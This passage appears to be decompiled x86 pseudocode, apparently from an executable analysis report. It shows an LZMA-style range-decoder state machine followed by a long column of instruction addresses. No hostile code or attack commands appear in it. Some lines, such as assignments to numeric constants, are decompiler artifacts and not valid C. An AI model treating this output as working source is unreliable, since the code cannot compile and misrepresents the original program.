                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								__eax = _v92;
                                                                                                                      								_v136 = 0x13;
                                                                                                                      								__esi = _v92 + 2;
                                                                                                                      								L135:
                                                                                                                      								_v88 = _t626;
                                                                                                                      								goto L136;
                                                                                                                      							}
                                                                                                                      							__eax = _v80;
                                                                                                                      							_v52 = _v52 & 0x00000000;
                                                                                                                      							__ecx = _v92;
                                                                                                                      							__eax = _v80 << 4;
                                                                                                                      							__eflags = __eax;
                                                                                                                      							__eax = _v92 + __eax + 4;
                                                                                                                      							goto L133;
                                                                                                                      						case 0x13:
                                                                                                                      							__eflags = _v68;
                                                                                                                      							if(_v68 != 0) {
                                                                                                                      								_t475 =  &_v92;
                                                                                                                      								 *_t475 = _v92 + 0x204;
                                                                                                                      								__eflags =  *_t475;
                                                                                                                      								_v52 = 0x10;
                                                                                                                      								_v68 = 8;
                                                                                                                      								L147:
                                                                                                                      								_v128 = 0x14;
                                                                                                                      								goto L148;
                                                                                                                      							}
                                                                                                                      							__eax = _v80;
                                                                                                                      							__ecx = _v92;
                                                                                                                      							__eax = _v80 << 4;
                                                                                                                      							_v52 = 8;
                                                                                                                      							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                      							L133:
                                                                                                                      							_v92 = __eax;
                                                                                                                      							_v68 = 3;
                                                                                                                      							goto L147;
                                                                                                                      						case 0x14:
                                                                                                                      							_v52 = _v52 + __ebx;
                                                                                                                      							__eax = _v132;
                                                                                                                      							goto L143;
                                                                                                                      						case 0x15:
                                                                                                                      							__eax = 0;
                                                                                                                      							__eflags = _v60 - 7;
                                                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      							__al = __al & 0x000000fd;
                                                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      							goto L123;
                                                                                                                      						case 0x16:
                                                                                                                      							__eax = _v52;
                                                                                                                      							__eflags = __eax - 4;
                                                                                                                      							if(__eax >= 4) {
                                                                                                                      								_push(3);
                                                                                                                      								_pop(__eax);
                                                                                                                      							}
                                                                                                                      							__ecx = _v8;
                                                                                                                      							_v68 = 6;
                                                                                                                      							__eax = __eax << 7;
                                                                                                                      							_v128 = 0x19;
                                                                                                                      							_v92 = __eax;
                                                                                                                      							goto L148;
                                                                                                                      						case 0x17:
                                                                                                                      							L148:
                                                                                                                      							__eax = _v68;
                                                                                                                      							_v84 = 1;
                                                                                                                      							_v76 = _v68;
                                                                                                                      							goto L152;
                                                                                                                      						case 0x18:
                                                                                                                      							L149:
                                                                                                                      							__eflags = _v112;
                                                                                                                      							if(_v112 == 0) {
                                                                                                                      								_v140 = 0x18;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v116;
                                                                                                                      							__eax = _v16;
                                                                                                                      							_v20 = _v20 << 8;
                                                                                                                      							__ecx =  *_v116 & 0x000000ff;
                                                                                                                      							_v112 = _v112 - 1;
                                                                                                                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							_t490 =  &_v116;
                                                                                                                      							 *_t490 = _v116 + 1;
                                                                                                                      							__eflags =  *_t490;
                                                                                                                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                      							L151:
                                                                                                                      							_t493 =  &_v76;
                                                                                                                      							 *_t493 = _v76 - 1;
                                                                                                                      							__eflags =  *_t493;
                                                                                                                      							L152:
                                                                                                                      							__eflags = _v76;
                                                                                                                      							if(_v76 <= 0) {
                                                                                                                      								__ecx = _v68;
                                                                                                                      								__ebx = _v84;
                                                                                                                      								0 = 1;
                                                                                                                      								__eax = 1 << __cl;
                                                                                                                      								__ebx = _v84 - (1 << __cl);
                                                                                                                      								__eax = _v128;
                                                                                                                      								_v72 = __ebx;
                                                                                                                      								L143:
                                                                                                                      								_v140 = _t561;
                                                                                                                      								goto L3;
                                                                                                                      							}
                                                                                                                      							__eax = _v84;
                                                                                                                      							_v20 = _v20 >> 0xb;
                                                                                                                      							__edx = _v84 + _v84;
                                                                                                                      							__eax = _v92;
                                                                                                                      							__esi = __edx + __eax;
                                                                                                                      							_v88 = __esi;
                                                                                                                      							__ax =  *__esi;
                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                      							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                      							__eflags = _v16 - __ecx;
                                                                                                                      							if(_v16 >= __ecx) {
                                                                                                                      								_v20 = _v20 - __ecx;
                                                                                                                      								_v16 = _v16 - __ecx;
                                                                                                                      								__cx = __ax;
                                                                                                                      								__cx = __ax >> 5;
                                                                                                                      								__eax = __eax - __ecx;
                                                                                                                      								__edx = __edx + 1;
                                                                                                                      								__eflags = __edx;
                                                                                                                      								 *__esi = __ax;
                                                                                                                      								_v84 = __edx;
                                                                                                                      							} else {
                                                                                                                      								_v20 = __ecx;
                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      								_v84 = _v84 << 1;
                                                                                                                      								 *__esi = __cx;
                                                                                                                      							}
                                                                                                                      							__eflags = _v20 - 0x1000000;
                                                                                                                      							if(_v20 >= 0x1000000) {
                                                                                                                      								goto L151;
                                                                                                                      							} else {
                                                                                                                      								goto L149;
                                                                                                                      							}
                                                                                                                      						case 0x19:
                                                                                                                      							__eflags = __ebx - 4;
                                                                                                                      							if(__ebx < 4) {
                                                                                                                      								_v48 = __ebx;
                                                                                                                      								L122:
                                                                                                                      								_t399 =  &_v48;
                                                                                                                      								 *_t399 = _v48 + 1;
                                                                                                                      								__eflags =  *_t399;
                                                                                                                      								L123:
                                                                                                                      								__eax = _v48;
                                                                                                                      								__eflags = __eax;
                                                                                                                      								if(__eax == 0) {
                                                                                                                      									_v52 = _v52 | 0xffffffff;
                                                                                                                      									goto L173;
                                                                                                                      								}
                                                                                                                      								__eflags = __eax - _v100;
                                                                                                                      								if(__eax > _v100) {
                                                                                                                      									goto L174;
                                                                                                                      								}
                                                                                                                      								_v52 = _v52 + 2;
                                                                                                                      								__eax = _v52;
                                                                                                                      								_t406 =  &_v100;
                                                                                                                      								 *_t406 = _v100 + _v52;
                                                                                                                      								__eflags =  *_t406;
                                                                                                                      								goto L126;
                                                                                                                      							}
                                                                                                                      							__ecx = __ebx;
                                                                                                                      							__eax = __ebx;
                                                                                                                      							__ecx = __ebx >> 1;
                                                                                                                      							__eax = __ebx & 0x00000001;
                                                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                                                      							__al = __al | 0x00000002;
                                                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                      							__eflags = __ebx - 0xe;
                                                                                                                      							_v48 = __eax;
                                                                                                                      							if(__ebx >= 0xe) {
                                                                                                                      								__ebx = 0;
                                                                                                                      								_v76 = __ecx;
                                                                                                                      								L105:
                                                                                                                      								__eflags = _v76;
                                                                                                                      								if(_v76 <= 0) {
                                                                                                                      									__eax = __eax + __ebx;
                                                                                                                      									_v68 = 4;
                                                                                                                      									_v48 = __eax;
                                                                                                                      									__eax = _v8;
                                                                                                                      									__eax = _v8 + 0x644;
                                                                                                                      									__eflags = __eax;
                                                                                                                      									L111:
                                                                                                                      									__ebx = 0;
                                                                                                                      									_v92 = __eax;
                                                                                                                      									_v84 = 1;
                                                                                                                      									_v72 = 0;
                                                                                                                      									_v76 = 0;
                                                                                                                      									L115:
                                                                                                                      									__eax = _v68;
                                                                                                                      									__eflags = _v76 - _v68;
                                                                                                                      									if(_v76 >= _v68) {
                                                                                                                      										_t397 =  &_v48;
                                                                                                                      										 *_t397 = _v48 + __ebx;
                                                                                                                      										__eflags =  *_t397;
                                                                                                                      										goto L122;
                                                                                                                      									}
                                                                                                                      									__eax = _v84;
                                                                                                                      									_v20 = _v20 >> 0xb;
                                                                                                                      									__edi = _v84 + _v84;
                                                                                                                      									__eax = _v92;
                                                                                                                      									__esi = __edi + __eax;
                                                                                                                      									_v88 = __esi;
                                                                                                                      									__ax =  *__esi;
                                                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                                                      									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                      									__eflags = _v16 - __edx;
                                                                                                                      									if(_v16 >= __edx) {
                                                                                                                      										__ecx = 0;
                                                                                                                      										_v20 = _v20 - __edx;
                                                                                                                      										__ecx = 1;
                                                                                                                      										_v16 = _v16 - __edx;
                                                                                                                      										__ebx = 1;
                                                                                                                      										__ecx = _v76;
                                                                                                                      										__ebx = 1 << __cl;
                                                                                                                      										__ecx = 1 << __cl;
                                                                                                                      										__ebx = _v72;
                                                                                                                      										__ebx = _v72 | __ecx;
                                                                                                                      										__cx = __ax;
                                                                                                                      										__cx = __ax >> 5;
                                                                                                                      										__eax = __eax - __ecx;
                                                                                                                      										__edi = __edi + 1;
                                                                                                                      										__eflags = __edi;
                                                                                                                      										_v72 = __ebx;
                                                                                                                      										 *__esi = __ax;
                                                                                                                      										_v84 = __edi;
                                                                                                                      									} else {
                                                                                                                      										_v20 = __edx;
                                                                                                                      										0x800 = 0x800 - __ecx;
                                                                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                      										_v84 = _v84 << 1;
                                                                                                                      										 *__esi = __dx;
                                                                                                                      									}
                                                                                                                      									__eflags = _v20 - 0x1000000;
                                                                                                                      									if(_v20 >= 0x1000000) {
                                                                                                                      										L114:
                                                                                                                      										_t374 =  &_v76;
                                                                                                                      										 *_t374 = _v76 + 1;
                                                                                                                      										__eflags =  *_t374;
                                                                                                                      										goto L115;
                                                                                                                      									} else {
                                                                                                                      										goto L112;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								__ecx = _v16;
                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                      								_v20 = _v20 >> 1;
                                                                                                                      								__eflags = _v16 - _v20;
                                                                                                                      								_v72 = __ebx;
                                                                                                                      								if(_v16 >= _v20) {
                                                                                                                      									__ecx = _v20;
                                                                                                                      									_v16 = _v16 - _v20;
                                                                                                                      									__ebx = __ebx | 0x00000001;
                                                                                                                      									__eflags = __ebx;
                                                                                                                      									_v72 = __ebx;
                                                                                                                      								}
                                                                                                                      								__eflags = _v20 - 0x1000000;
                                                                                                                      								if(_v20 >= 0x1000000) {
                                                                                                                      									L104:
                                                                                                                      									_t344 =  &_v76;
                                                                                                                      									 *_t344 = _v76 - 1;
                                                                                                                      									__eflags =  *_t344;
                                                                                                                      									goto L105;
                                                                                                                      								} else {
                                                                                                                      									goto L102;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							__edx = _v8;
                                                                                                                      							__eax = __eax - __ebx;
                                                                                                                      							_v68 = __ecx;
                                                                                                                      							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                      							goto L111;
                                                                                                                      						case 0x1a:
                                                                                                                      							L58:
                                                                                                                      							__eflags = _v104;
                                                                                                                      							if(_v104 == 0) {
                                                                                                                      								_v140 = 0x1a;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__ecx = _v108;
                                                                                                                      							__al = _v96;
                                                                                                                      							__edx = _v12;
                                                                                                                      							_v100 = _v100 + 1;
                                                                                                                      							_v108 = _v108 + 1;
                                                                                                                      							_v104 = _v104 - 1;
                                                                                                                      							 *_v108 = __al;
                                                                                                                      							__ecx = _v24;
                                                                                                                      							 *(_v12 + __ecx) = __al;
                                                                                                                      							__eax = __ecx + 1;
                                                                                                                      							__edx = 0;
                                                                                                                      							_t197 = __eax % _v120;
                                                                                                                      							__eax = __eax / _v120;
                                                                                                                      							__edx = _t197;
                                                                                                                      							goto L82;
                                                                                                                      						case 0x1b:
                                                                                                                      							L78:
                                                                                                                      							__eflags = _v104;
                                                                                                                      							if(_v104 == 0) {
                                                                                                                      								_v140 = 0x1b;
                                                                                                                      								goto L173;
                                                                                                                      							}
                                                                                                                      							__eax = _v24;
                                                                                                                      							__eax = _v24 - _v48;
                                                                                                                      							__eflags = __eax - _v120;
                                                                                                                      							if(__eax >= _v120) {
                                                                                                                      								__eax = __eax + _v120;
                                                                                                                      								__eflags = __eax;
                                                                                                                      							}
                                                                                                                      							__edx = _v12;
                                                                                                                      							__cl =  *(__edx + __eax);
                                                                                                                      							__eax = _v24;
                                                                                                                      							_v96 = __cl;
                                                                                                                      							 *(__edx + __eax) = __cl;
                                                                                                                      							__eax = __eax + 1;
                                                                                                                      							__edx = 0;
                                                                                                                      							_t280 = __eax % _v120;
                                                                                                                      							__eax = __eax / _v120;
                                                                                                                      							__edx = _t280;
                                                                                                                      							__eax = _v108;
                                                                                                                      							_v100 = _v100 + 1;
                                                                                                                      							_v108 = _v108 + 1;
                                                                                                                      							_t289 =  &_v104;
                                                                                                                      							 *_t289 = _v104 - 1;
                                                                                                                      							__eflags =  *_t289;
                                                                                                                      							 *_v108 = __cl;
                                                                                                                      							L82:
                                                                                                                      							_v24 = __edx;
                                                                                                                      							goto L83;
                                                                                                                      						case 0x1c:
                                                                                                                      							while(1) {
                                                                                                                      								L126:
                                                                                                                      								__eflags = _v104;
                                                                                                                      								if(_v104 == 0) {
                                                                                                                      									break;
                                                                                                                      								}
                                                                                                                      								__eax = _v24;
                                                                                                                      								__eax = _v24 - _v48;
                                                                                                                      								__eflags = __eax - _v120;
                                                                                                                      								if(__eax >= _v120) {
                                                                                                                      									__eax = __eax + _v120;
                                                                                                                      									__eflags = __eax;
                                                                                                                      								}
                                                                                                                      								__edx = _v12;
                                                                                                                      								__cl =  *(__edx + __eax);
                                                                                                                      								__eax = _v24;
                                                                                                                      								_v96 = __cl;
                                                                                                                      								 *(__edx + __eax) = __cl;
                                                                                                                      								__eax = __eax + 1;
                                                                                                                      								__edx = 0;
                                                                                                                      								_t420 = __eax % _v120;
                                                                                                                      								__eax = __eax / _v120;
                                                                                                                      								__edx = _t420;
                                                                                                                      								__eax = _v108;
                                                                                                                      								_v108 = _v108 + 1;
                                                                                                                      								_v104 = _v104 - 1;
                                                                                                                      								_v52 = _v52 - 1;
                                                                                                                      								__eflags = _v52;
                                                                                                                      								 *_v108 = __cl;
                                                                                                                      								_v24 = _t420;
                                                                                                                      								if(_v52 > 0) {
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									L83:
                                                                                                                      									_v140 = 2;
                                                                                                                      									goto L3;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							_v140 = 0x1c;
                                                                                                                      							L173:
                                                                                                                      							_push(0x22);
                                                                                                                      							_pop(_t574);
                                                                                                                      							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                      							return 0;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				L174:
                                                                                                                      				_t538 = _t537 | 0xffffffff;
                                                                                                                      				return _t538;
                                                                                                                      			}










































                                                                                                                      0x0040691b
                                                                                                                      0x00406922
                                                                                                                      0x00406928
                                                                                                                      0x0040692e
                                                                                                                      0x00000000
                                                                                                                      0x00406932
                                                                                                                      0x0040693e
                                                                                                                      0x0040693e
                                                                                                                      0x0040693e
                                                                                                                      0x00406947
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00000000
                                                                                                                      0x00406954
                                                                                                                      0x00406958
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406961
                                                                                                                      0x00406964
                                                                                                                      0x00406967
                                                                                                                      0x00406969
                                                                                                                      0x0040696b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406971
                                                                                                                      0x00406974
                                                                                                                      0x00406976
                                                                                                                      0x00406977
                                                                                                                      0x0040697a
                                                                                                                      0x0040697c
                                                                                                                      0x0040697d
                                                                                                                      0x0040697f
                                                                                                                      0x00406982
                                                                                                                      0x00406987
                                                                                                                      0x0040698c
                                                                                                                      0x00406995
                                                                                                                      0x004069a8
                                                                                                                      0x004069ab
                                                                                                                      0x004069b4
                                                                                                                      0x004069b7
                                                                                                                      0x004069df
                                                                                                                      0x004069df
                                                                                                                      0x004069e1
                                                                                                                      0x004069ef
                                                                                                                      0x004069ef
                                                                                                                      0x004069f3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004069e3
                                                                                                                      0x004069e3
                                                                                                                      0x004069e6
                                                                                                                      0x004069e6
                                                                                                                      0x004069e7
                                                                                                                      0x004069e7
                                                                                                                      0x00000000
                                                                                                                      0x004069e3
                                                                                                                      0x004069b9
                                                                                                                      0x004069bd
                                                                                                                      0x004069c2
                                                                                                                      0x004069c2
                                                                                                                      0x004069cb
                                                                                                                      0x004069d1
                                                                                                                      0x004069d3
                                                                                                                      0x004069d6
                                                                                                                      0x00000000
                                                                                                                      0x004069dc
                                                                                                                      0x004069dc
                                                                                                                      0x00000000
                                                                                                                      0x004069dc
                                                                                                                      0x00000000
                                                                                                                      0x004069f9
                                                                                                                      0x004069f9
                                                                                                                      0x004069fd
                                                                                                                      0x004072a9
                                                                                                                      0x00000000
                                                                                                                      0x004072a9
                                                                                                                      0x00406a06
                                                                                                                      0x00406a16
                                                                                                                      0x00406a19
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1c
                                                                                                                      0x00406a1f
                                                                                                                      0x00406a1f
                                                                                                                      0x00406a23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a25
                                                                                                                      0x00406a28
                                                                                                                      0x00406a2b
                                                                                                                      0x00406a55
                                                                                                                      0x00406a5b
                                                                                                                      0x00406a62
                                                                                                                      0x00000000
                                                                                                                      0x00406a62
                                                                                                                      0x00406a2d
                                                                                                                      0x00406a31
                                                                                                                      0x00406a34
                                                                                                                      0x00406a39
                                                                                                                      0x00406a39
                                                                                                                      0x00406a44
                                                                                                                      0x00406a4a
                                                                                                                      0x00406a4c
                                                                                                                      0x00406a4f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a94
                                                                                                                      0x00406a9a
                                                                                                                      0x00406a9d
                                                                                                                      0x00406aaa
                                                                                                                      0x00406ab2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406a69
                                                                                                                      0x00406a69
                                                                                                                      0x00406a6d
                                                                                                                      0x004072b8
                                                                                                                      0x00000000
                                                                                                                      0x004072b8
                                                                                                                      0x00406a79
                                                                                                                      0x00406a84
                                                                                                                      0x00406a84
                                                                                                                      0x00406a84
                                                                                                                      0x00406a87
                                                                                                                      0x00406a8a
                                                                                                                      0x00406a8d
                                                                                                                      0x00406a90
                                                                                                                      0x00406a92
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00407129
                                                                                                                      0x00407129
                                                                                                                      0x0040712f
                                                                                                                      0x00407135
                                                                                                                      0x00407138
                                                                                                                      0x0040713b
                                                                                                                      0x00407155
                                                                                                                      0x00407158
                                                                                                                      0x0040715e
                                                                                                                      0x00407169
                                                                                                                      0x00407169
                                                                                                                      0x0040716b
                                                                                                                      0x0040713d
                                                                                                                      0x0040713d
                                                                                                                      0x0040714c
                                                                                                                      0x00407150
                                                                                                                      0x00407150
                                                                                                                      0x0040716e
                                                                                                                      0x00407175
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00407177
                                                                                                                      0x00407177
                                                                                                                      0x0040717b
                                                                                                                      0x0040732a
                                                                                                                      0x00000000
                                                                                                                      0x0040732a
                                                                                                                      0x00407187
                                                                                                                      0x0040718e
                                                                                                                      0x00407196
                                                                                                                      0x00407196
                                                                                                                      0x00407196
                                                                                                                      0x00407199
                                                                                                                      0x0040719c
                                                                                                                      0x0040719c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406aba
                                                                                                                      0x00406abc
                                                                                                                      0x00406abf
                                                                                                                      0x00406b30
                                                                                                                      0x00406b33
                                                                                                                      0x00406b36
                                                                                                                      0x00406b3d
                                                                                                                      0x00406b47
                                                                                                                      0x00000000
                                                                                                                      0x00406b47
                                                                                                                      0x00406ac1
                                                                                                                      0x00406ac5
                                                                                                                      0x00406ac8
                                                                                                                      0x00406aca
                                                                                                                      0x00406acd
                                                                                                                      0x00406ad0
                                                                                                                      0x00406ad2
                                                                                                                      0x00406ad5
                                                                                                                      0x00406ad7
                                                                                                                      0x00406adc
                                                                                                                      0x00406adf
                                                                                                                      0x00406ae2
                                                                                                                      0x00406ae6
                                                                                                                      0x00406aed
                                                                                                                      0x00406af0
                                                                                                                      0x00406af7
                                                                                                                      0x00406afb
                                                                                                                      0x00406b03
                                                                                                                      0x00406b03
                                                                                                                      0x00406b03
                                                                                                                      0x00406afd
                                                                                                                      0x00406afd
                                                                                                                      0x00406afd
                                                                                                                      0x00406af2
                                                                                                                      0x00406af2
                                                                                                                      0x00406af2
                                                                                                                      0x00406b07
                                                                                                                      0x00406b0a
                                                                                                                      0x00406b28
                                                                                                                      0x00406b2a
                                                                                                                      0x00000000
                                                                                                                      0x00406b2a
                                                                                                                      0x00406b0c
                                                                                                                      0x00406b0f
                                                                                                                      0x00406b12
                                                                                                                      0x00406b15
                                                                                                                      0x00406b17
                                                                                                                      0x00406b17
                                                                                                                      0x00406b17
                                                                                                                      0x00406b1a
                                                                                                                      0x00406b1d
                                                                                                                      0x00406b1f
                                                                                                                      0x00406b20
                                                                                                                      0x00406b23
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406d59
                                                                                                                      0x00406d5d
                                                                                                                      0x00406d7b
                                                                                                                      0x00406d7e
                                                                                                                      0x00406d85
                                                                                                                      0x00406d88
                                                                                                                      0x00406d8b
                                                                                                                      0x00406d8e
                                                                                                                      0x00406d91
                                                                                                                      0x00406d94
                                                                                                                      0x00406d96
                                                                                                                      0x00406d9d
                                                                                                                      0x00406d9e
                                                                                                                      0x00406da0
                                                                                                                      0x00406da3
                                                                                                                      0x00406da6
                                                                                                                      0x00406da9
                                                                                                                      0x00406da9
                                                                                                                      0x00406dae
                                                                                                                      0x00000000
                                                                                                                      0x00406dae
                                                                                                                      0x00406d5f
                                                                                                                      0x00406d62
                                                                                                                      0x00406d65
                                                                                                                      0x00406d6f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406dc3
                                                                                                                      0x00406dc7
                                                                                                                      0x00406dea
                                                                                                                      0x00406ded
                                                                                                                      0x00406df0
                                                                                                                      0x00406dfa
                                                                                                                      0x00406dc9
                                                                                                                      0x00406dc9
                                                                                                                      0x00406dcc
                                                                                                                      0x00406dcf
                                                                                                                      0x00406dd2
                                                                                                                      0x00406ddf
                                                                                                                      0x00406de2
                                                                                                                      0x00406de2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e06
                                                                                                                      0x00406e0a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e10
                                                                                                                      0x00406e14
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e1a
                                                                                                                      0x00406e1c
                                                                                                                      0x00406e20
                                                                                                                      0x00406e20
                                                                                                                      0x00406e23
                                                                                                                      0x00406e27
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e77
                                                                                                                      0x00406e7b
                                                                                                                      0x00406e82
                                                                                                                      0x00406e85
                                                                                                                      0x00406e88
                                                                                                                      0x00406e92
                                                                                                                      0x00000000
                                                                                                                      0x00406e92
                                                                                                                      0x00406e7d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e9e
                                                                                                                      0x00406ea2
                                                                                                                      0x00406ea9
                                                                                                                      0x00406eac
                                                                                                                      0x00406eaf
                                                                                                                      0x00406ea4
                                                                                                                      0x00406ea4
                                                                                                                      0x00406ea4
                                                                                                                      0x00406eb2
                                                                                                                      0x00406eb5
                                                                                                                      0x00406eb8
                                                                                                                      0x00406eb8
                                                                                                                      0x00406ebb
                                                                                                                      0x00406ebe
                                                                                                                      0x00406ec1
                                                                                                                      0x00406ec1
                                                                                                                      0x00406ec4
                                                                                                                      0x00406ecb
                                                                                                                      0x00406ed0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406f5e
                                                                                                                      0x00406f5e
                                                                                                                      0x00406f62
                                                                                                                      0x00407300
                                                                                                                      0x00000000
                                                                                                                      0x00407300
                                                                                                                      0x00406f68
                                                                                                                      0x00406f6b
                                                                                                                      0x00406f6e
                                                                                                                      0x00406f72
                                                                                                                      0x00406f75
                                                                                                                      0x00406f7b
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f7d
                                                                                                                      0x00406f80
                                                                                                                      0x00406f83
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b53
                                                                                                                      0x00406b53
                                                                                                                      0x00406b57
                                                                                                                      0x004072c4
                                                                                                                      0x00000000
                                                                                                                      0x004072c4
                                                                                                                      0x00406b5d
                                                                                                                      0x00406b60
                                                                                                                      0x00406b63
                                                                                                                      0x00406b67
                                                                                                                      0x00406b6a
                                                                                                                      0x00406b70
                                                                                                                      0x00406b72
                                                                                                                      0x00406b72
                                                                                                                      0x00406b72
                                                                                                                      0x00406b75
                                                                                                                      0x00406b78
                                                                                                                      0x00406b78
                                                                                                                      0x00406b7b
                                                                                                                      0x00406b7e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b84
                                                                                                                      0x00406b8a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406b90
                                                                                                                      0x00406b90
                                                                                                                      0x00406b94
                                                                                                                      0x00406b97
                                                                                                                      0x00406b9a
                                                                                                                      0x00406b9d
                                                                                                                      0x00406ba0
                                                                                                                      0x00406ba1
                                                                                                                      0x00406ba4
                                                                                                                      0x00406ba6
                                                                                                                      0x00406bac
                                                                                                                      0x00406baf
                                                                                                                      0x00406bb2
                                                                                                                      0x00406bb5
                                                                                                                      0x00406bb8
                                                                                                                      0x00406bbb
                                                                                                                      0x00406bbe
                                                                                                                      0x00406bda
                                                                                                                      0x00406bdd
                                                                                                                      0x00406be0
                                                                                                                      0x00406be3
                                                                                                                      0x00406bea
                                                                                                                      0x00406bee
                                                                                                                      0x00406bf0
                                                                                                                      0x00406bf4
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc4
                                                                                                                      0x00406bcc
                                                                                                                      0x00406bd1
                                                                                                                      0x00406bd3
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bf7
                                                                                                                      0x00406bfe
                                                                                                                      0x00406c01
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c10
                                                                                                                      0x004072d0
                                                                                                                      0x00000000
                                                                                                                      0x004072d0
                                                                                                                      0x00406c16
                                                                                                                      0x00406c19
                                                                                                                      0x00406c1c
                                                                                                                      0x00406c20
                                                                                                                      0x00406c23
                                                                                                                      0x00406c29
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2e
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c37
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c39
                                                                                                                      0x00406c3c
                                                                                                                      0x00406c3f
                                                                                                                      0x00406c42
                                                                                                                      0x00406c45
                                                                                                                      0x00406c48
                                                                                                                      0x00406c4b
                                                                                                                      0x00406c4e
                                                                                                                      0x00406c51
                                                                                                                      0x00406c54
                                                                                                                      0x00406c57
                                                                                                                      0x00406c6f
                                                                                                                      0x00406c72
                                                                                                                      0x00406c75
                                                                                                                      0x00406c78
                                                                                                                      0x00406c7b
                                                                                                                      0x00406c7f
                                                                                                                      0x00406c81
                                                                                                                      0x00406c59
                                                                                                                      0x00406c59
                                                                                                                      0x00406c61
                                                                                                                      0x00406c66
                                                                                                                      0x00406c68
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c84
                                                                                                                      0x00406c8b
                                                                                                                      0x00406c8e
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00406c8e
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd4
                                                                                                                      0x004072dc
                                                                                                                      0x00000000
                                                                                                                      0x004072dc
                                                                                                                      0x00406cda
                                                                                                                      0x00406cdd
                                                                                                                      0x00406ce0
                                                                                                                      0x00406ce4
                                                                                                                      0x00406ce7
                                                                                                                      0x00406ced
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cf2
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cfb
                                                                                                                      0x00406c99
                                                                                                                      0x00406c99
                                                                                                                      0x00406c9c
                                                                                                                      0x00000000
                                                                                                                      0x00406c9c
                                                                                                                      0x00406cfd
                                                                                                                      0x00406cfd
